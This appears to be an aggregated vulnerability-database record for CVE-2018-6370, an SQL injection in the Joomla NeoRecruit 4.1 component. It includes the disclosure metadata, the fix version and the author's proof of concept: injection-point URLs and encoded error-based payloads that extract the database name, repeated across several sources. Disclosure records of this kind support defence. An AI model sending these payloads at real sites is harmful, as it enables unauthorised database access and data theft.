ID EDB-ID:44123
Type exploitdb
Reporter Exploit-DB
Modified 2018-02-16T00:00:00
Description
Joomla! Component NeoRecruit 4.1 - SQL Injection. CVE-2018-6370. Webapps exploit for PHP platform. Tags: SQL Injection (SQLi)
# # # #
# Exploit Title: Joomla! Component NeoRecruit 4.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://neojoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/
# Version: 4.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6370
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/neorecruit/all-offers/xxx[SQL].html
# http://localhost/[PATH]/neorecruit/xxx/xxx[SQL]
#
# JTI3JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM3JTMwJTM0JTMxJTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI3JTQ1JTY2JTY1JTI3JTNkJTI3JTQ1JTY2JTY1
#
# J2FuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0KHNlbGVjdCBjb25jYXQoY2FzdChkYXRhYmFzZSgpIGFzIGNoYXIpLDB4N2UpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkgQU5EICcnPSc=
#
# # # #
{"id": "EDB-ID:44123", "hash": "7009f066f7084f6125762a77e17621da", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla! Component NeoRecruit 4.1 - SQL Injection", "description": "Joomla! Component NeoRecruit 4.1 - SQL Injection. CVE-2018-6370. Webapps exploit for PHP platform. Tags: SQL Injection (SQLi)", "published": "2018-02-16T00:00:00", "modified": "2018-02-16T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://www.exploit-db.com/exploits/44123/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2018-6370"], "lastseen": "2018-02-16T23:01:41", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-6370"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146453"]}, {"type": "joomla", "idList": ["JVEL:587"]}, {"type": "zdt", "idList": ["1337DAY-ID-29831"]}], "modified": "2018-02-16T23:01:41"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/44123/", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component NeoRecruit 4.1 - SQL Injection\r\n# Dork: N/A\r\n# Date: 16.02.2018\r\n# Vendor Homepage: http://neojoomla.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/\r\n# Version: 4.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-6370\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/neorecruit/all-offers/xxx[SQL].html\r\n# http://localhost/[PATH]/neorecruit/xxx/xxx[SQL]\r\n# \r\n# JTI3JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM3JTMwJTM0JTMxJTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI3JTQ1JTY2JTY1JTI3JTNkJTI3JTQ1JTY2JTY1\r\n# \r\n# J2FuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0KHNlbGVjdCBjb25jYXQoY2FzdChkYXRhYmFzZSgpIGFzIGNoYXIpLDB4N2UpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkgQU5EICcnPSc=\r\n# \r\n# # # #", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2018-03-06T12:54:35", "bulletinFamily": "NVD", "description": "SQL Injection exists in the NeoRecruit 4.1 component for Joomla! via the (1) PATH_INFO or (2) name of a .html file under the all-offers/ URI.", "modified": "2018-03-05T11:02:13", "published": "2018-02-17T02:29:01", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6370", "id": "CVE-2018-6370", "title": "CVE-2018-6370", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "joomla": [{"lastseen": "2018-09-18T08:40:47", "bulletinFamily": "software", "description": "NeoRecruit by NeoJoomla, versions 4.2.1 and previous, SQL Injection\n\nresolution: update to 4.2.2\n\nupdate notice: http://www.neojoomla.com/index.php?option=com_content&task;=view&id;=275&Itemid;=2\n", "modified": "2018-03-05T23:42:47", "published": "2018-03-05T00:00:00", "id": "JVEL:587", "href": "https://vel.joomla.org/vel-blog/2114", "type": "joomla", "title": "NeoRecruit, 4.2.1, SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-02-17T17:02:52", "bulletinFamily": "exploit", "description": "", "modified": "2018-02-17T00:00:00", "published": "2018-02-17T00:00:00", "href": "https://packetstormsecurity.com/files/146453/Joomla-NeoRecruit-4.1-SQL-Injection.html", "id": "PACKETSTORM:146453", "title": "Joomla! NeoRecruit 4.1 SQL Injection", "type": "packetstorm", "sourceData": "`# # # # \n# Exploit Title: Joomla! Component NeoRecruit 4.1 - SQL Injection \n# Dork: N/A \n# Date: 16.02.2018 \n# Vendor Homepage: http://neojoomla.com/ \n# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/ \n# Version: 4.1 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-6370 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/neorecruit/all-offers/xxx[SQL].html \n# http://localhost/[PATH]/neorecruit/xxx/xxx[SQL] \n# \n# # # # \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/146453/joomlaneorecruit41-sql.txt"}], "zdt": [{"lastseen": "2018-04-02T01:29:25", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-02-17T00:00:00", "published": "2018-02-17T00:00:00", "href": "https://0day.today/exploit/description/29831", "id": "1337DAY-ID-29831", "title": "Joomla NeoRecruit 4.1 Component - SQL Injection Vulnerability", "type": "zdt", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component NeoRecruit 4.1 - SQL Injection\r\n# Vendor Homepage: http://neojoomla.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/\r\n# Version: 4.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-6370\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/neorecruit/all-offers/xxx[SQL].html\r\n# http://localhost/[PATH]/neorecruit/xxx/xxx[SQL]\r\n# \r\n# JTI3JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM3JTMwJTM0JTMxJTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI3JTQ1JTY2JTY1JTI3JTNkJTI3JTQ1JTY2JTY1\r\n# \r\n# J2FuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0KHNlbGVjdCBjb25jYXQoY2FzdChkYXRhYmFzZSgpIGFzIGNoYXIpLDB4N2UpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkgQU5EICcnPSc=\r\n# \r\n# # # #\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29831"}]}